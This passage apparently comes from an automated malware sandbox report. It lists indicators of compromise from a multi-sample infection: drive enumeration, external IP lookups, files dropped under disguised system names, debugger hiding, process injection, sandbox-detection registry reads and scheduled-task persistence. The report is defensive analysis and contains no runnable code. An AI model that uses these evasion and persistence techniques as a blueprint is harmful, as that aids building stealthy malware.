\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1903531.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N0VjIjlb_wrY4X36qFb0KkVc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GT4rJDknjBn1Q15NPVcLOGnM.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1793412.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XvFe4GzJul_YZ2OFsGeMoF0i.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exeinstaller.exeInstall.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\N: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 218 ip-api.com 1 ip-api.com 14 ipinfo.io 22 ipinfo.io 129 ipinfo.io 183 ipinfo.io -
Drops file in System32 directory 10 IoCs
Processes:
Install.execonhost.execonhost.execonhost.execonhost.exeInstall.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.log conhost.exe File created C:\Windows\system32\services32.exe conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
Processes:
Fri10d184202996a0d7f.exe2768772.scrcmd.execmd.exeGT4rJDknjBn1Q15NPVcLOGnM.exe3SIZP_yBJOASbSHbQAH4kgIc.exeMi7ACiBw_NKvp3OaVcQbL0ci.exe75lpt8hlC1NGZyE5J12J4MX_.exe2Uz1J5c5sQRXrL2lNS7Xs_QF.exeW5TmQT5ajJ9vWwg5m1wuKb6e.exe5478727.scr2897423.scr7105377.scr1793412.scr1903531.scrfilename.exe3353340.scrB1DF.exeF561.exe39DE.exeDatabase.exeDatabase.exepid process 4356 Fri10d184202996a0d7f.exe 6100 2768772.scr 5704 cmd.exe 2500 cmd.exe 4188 GT4rJDknjBn1Q15NPVcLOGnM.exe 4412 3SIZP_yBJOASbSHbQAH4kgIc.exe 3708 Mi7ACiBw_NKvp3OaVcQbL0ci.exe 3600 75lpt8hlC1NGZyE5J12J4MX_.exe 3180 2Uz1J5c5sQRXrL2lNS7Xs_QF.exe 2796 W5TmQT5ajJ9vWwg5m1wuKb6e.exe 3608 5478727.scr 3788 2897423.scr 1568 7105377.scr 4080 1793412.scr 8808 1903531.scr 5300 filename.exe 7452 3353340.scr 5420 B1DF.exe 1040 F561.exe 8784 39DE.exe 5168 Database.exe 5168 Database.exe 5168 Database.exe 5884 Database.exe 5884 Database.exe 5884 Database.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
WerFault.exehfNfszaiVyu9terbhxabjMWT.exevRimKORg6sXDoijekzeZQRUR.exeCV3wZcym4qGbTCJGIrRdV3Uq.exeuFV1qYteW8OniKJlNEeZ9vlH.exetWc9G0DT4j9vMtoJgQmAokMM.exetmpBC41_tmp.exeGcleanerEU.execonhost.exe134A.exeservices64.exeA4A1.exedescription pid process target process PID 3872 set thread context of 5768 3872 WerFault.exe Fri106e757f6d75.exe PID 4992 set thread context of 4948 4992 hfNfszaiVyu9terbhxabjMWT.exe hfNfszaiVyu9terbhxabjMWT.exe PID 4952 set thread context of 888 4952 vRimKORg6sXDoijekzeZQRUR.exe cmd.exe PID 4956 set thread context of 3772 4956 CV3wZcym4qGbTCJGIrRdV3Uq.exe RegSvcs.exe PID 2348 set thread context of 5280 2348 uFV1qYteW8OniKJlNEeZ9vlH.exe uFV1qYteW8OniKJlNEeZ9vlH.exe PID 7408 set thread context of 1528 7408 tWc9G0DT4j9vMtoJgQmAokMM.exe tWc9G0DT4j9vMtoJgQmAokMM.exe PID 4376 set thread context of 9024 4376 tmpBC41_tmp.exe tmpBC41_tmp.exe PID 8276 set thread context of 6116 8276 GcleanerEU.exe 3124.exe PID 5876 set thread context of 7440 5876 conhost.exe conhost.exe PID 8820 set thread context of 3476 8820 134A.exe 134A.exe PID 7464 set thread context of 6636 7464 services64.exe explorer.exe PID 3808 set thread context of 11372 3808 A4A1.exe RegSvcs.exe -
Drops file in Program Files directory 23 IoCs
Processes:
WXhP7Lj7noVP0ru01p2gZwdG.exeultramediaburner.tmpConhost.exeUjmEzzcdEw15G25sQGzbQOMX.exeShadowVPNInstaller_t3.exesetup_2.tmpdescription ioc process File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe WXhP7Lj7noVP0ru01p2gZwdG.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe Conhost.exe File created C:\Program Files (x86)\Reference Assemblies\Nuwemybykae.exe.config Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe UjmEzzcdEw15G25sQGzbQOMX.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe UjmEzzcdEw15G25sQGzbQOMX.exe File created C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe.config ShadowVPNInstaller_t3.exe File created C:\Program Files (x86)\FarLabUninstaller\is-4T7OP.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\Reference Assemblies\Nuwemybykae.exe Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe UjmEzzcdEw15G25sQGzbQOMX.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe WXhP7Lj7noVP0ru01p2gZwdG.exe File created C:\Program Files (x86)\Windows Defender\Qaelozhacele.exe ShadowVPNInstaller_t3.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-ENQLO.tmp ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\inst002.exe UjmEzzcdEw15G25sQGzbQOMX.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini UjmEzzcdEw15G25sQGzbQOMX.exe File created C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe ShadowVPNInstaller_t3.exe File created C:\Program Files (x86)\Windows Defender\Qaelozhacele.exe.config ShadowVPNInstaller_t3.exe File created C:\Program Files (x86)\UltraMediaBurner\is-7VA8Q.tmp ultramediaburner.tmp File created C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe.config Conhost.exe -
Drops file in Windows directory 28 IoCs
Processes:
msiexec.exeMsiExec.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Installer\MSIAFEE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6906.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI88E8.tmp msiexec.exe File opened for modification C:\Windows\Installer\54425.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI62BA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6BE6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9714.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8DFA.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF917C8E5A04A7343C.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI651C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6ABD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7F6F.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI8378.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI85EA.tmp msiexec.exe File created C:\Windows\Installer\54425.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI522E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFD349F65D8C1CE865.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFB6B69B2BADCC1A15.TMP msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI6740.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF0C233424393BAE5D.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI8DFB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAABD.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 34 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5740 5324 WerFault.exe rundll32.exe 5736 5204 WerFault.exe Fri10acd1e0a9e6.exe 912 4628 WerFault.exe Fri105268dda3.exe 5708 1172 WerFault.exe Fri1015b9a4e0b.exe 5012 4836 WerFault.exe Z0vWFXUapMHmh_phsDBKsg6d.exe 5276 4992 WerFault.exe hfNfszaiVyu9terbhxabjMWT.exe 5308 6096 WerFault.exe FGP00Y3mTuq2surDBGCBZ2PR.exe 6360 5020 WerFault.exe UjMxALCgOD36c61XgfZBL0C9.exe 6876 2480 WerFault.exe YkljOGa70o6I1XC7Gy3rDqXc.exe 2564 5972 WerFault.exe Eow9sch3bUzf_WXXvx7RU2Yr.exe 7272 5436 WerFault.exe t6fnIyPK4SEmcNK1OEvBGBKz.exe 5656 7632 WerFault.exe eInAfAAnadxOn3g6O89Cb5FT.exe 5868 5700 WerFault.exe ShadowVPNInstaller_t3.exe 9128 5700 WerFault.exe ShadowVPNInstaller_t3.exe 9044 4560 WerFault.exe Firstoffer.exe 8860 5700 WerFault.exe ShadowVPNInstaller_t3.exe 5528 7676 WerFault.exe 7DrghgbkgI2jLUHFNgq_bxXK.exe 1540 7332 WerFault.exe setup.exe 3484 2192 WerFault.exe rundll32.exe 7432 3848 WerFault.exe SgfJUJN11IroPHvivngzyLg1.exe 5152 5700 WerFault.exe ShadowVPNInstaller_t3.exe 7228 5700 WerFault.exe ShadowVPNInstaller_t3.exe 4852 5700 WerFault.exe ShadowVPNInstaller_t3.exe 6264 8692 WerFault.exe 8CD2.exe 5164 7868 WerFault.exe rundll32.exe 9652 8276 WerFault.exe GcleanerEU.exe 10320 10160 WerFault.exe rundll32.exe 10792 14468 WerFault.exe 5C99.exe 10904 14748 WerFault.exe GcleanerEU.exe 11312 13912 WerFault.exe 79F6.exe 11884 8168 WerFault.exe gcleaner.exe 11912 1988 WerFault.exe gcleaner.exe 12532 4796 WerFault.exe C52A.exe 3504 4416 WerFault.exe 123441egwegweg.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
uFV1qYteW8OniKJlNEeZ9vlH.exe134A.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uFV1qYteW8OniKJlNEeZ9vlH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 134A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 134A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 134A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uFV1qYteW8OniKJlNEeZ9vlH.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uFV1qYteW8OniKJlNEeZ9vlH.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeforfiles.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 forfiles.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier forfiles.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6516 schtasks.exe 7888 schtasks.exe 4680 schtasks.exe 2232 schtasks.exe 8020 schtasks.exe 9192 schtasks.exe 5092 schtasks.exe 2052 schtasks.exe 4256 schtasks.exe 2032 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 7304 timeout.exe 7616 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
WerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeforfiles.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS forfiles.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU forfiles.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened 